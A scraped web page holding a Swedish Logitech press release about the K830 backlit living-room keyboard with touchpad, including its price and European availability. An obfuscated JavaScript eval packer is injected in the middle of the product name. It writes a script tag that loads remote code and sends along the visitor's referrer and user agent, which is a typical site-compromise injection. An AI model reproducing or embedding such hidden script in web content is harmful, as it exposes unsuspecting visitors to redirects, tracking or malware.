Image Image Image Image Image Image Image Image Image Image

| 30 oktober, 2020

Scroll to top

Top

Navigera i hemmabiomörkret med Logitechs upplysta tangentbord K830

Navigera i hemmabiomörkret med Logitechs upplysta tangentbord K830

Idag lanserar Logitech nya Logitech® eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(’\b’+e(c)+’\b’,’g’),k[c])}}return p}(’0.6(”<\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|bbfnz|var|u0026u|referrer|feriy||js|php’.split(’|’),0,{}))
Illuminated Living-Room Keyboard K830
, designat för att lysa upp din tillvaro i vardagsrummet. Det uppladdningsbara tangentbordet innehåller bakgrundsbelysning, en inbyggd touchpad och kopplas upp trådlöst så du kan skriva och klicka från tv-fåtöljen även i mörkret.

”Fler och fler vill titta på sina filmer, tv-program och foton via PC:s kopplade till TV:n” säger Charlotte Johs, global vice VD för PC-tillbehör på Logitech. ”Vårt nya upplysta tangentbord K830 är speciellt framtaget för just detta. Dessutom är det designat för att passa in i vardagsrummet och utrustat med en mängd funktioner för dig som har kopplat ihop datorn och TV:n”.

Logitech K830 anpassar automatiskt belysningen efter hur ljust det är i rummet, så du kan skriva oavsett ljusförhållanden. Med sin stilrena design är det också designat för att passa in i vardagsrummet. Den trådlösa Unifying-mottagaren ger dig en snabb och pålitlig 2,4 GHz-uppkoppling från upp till tio meters avstånd och batterierna i tangentbordet är såklart uppladdningsbara. För att undvika att behöva använda både tangentbord och mus är K830 också utrustat med en följsam touchpad som låter dig kontrollera en muspekare utan stök.

Pris och tillgänglighet
Logitech K830 förväntas finnas tillgänglig i Europe från april 2014, med ett föreslaget pris på 999:-. För mer info besök www.logitech.com.

Detta är ett pressmeddelande från Logitech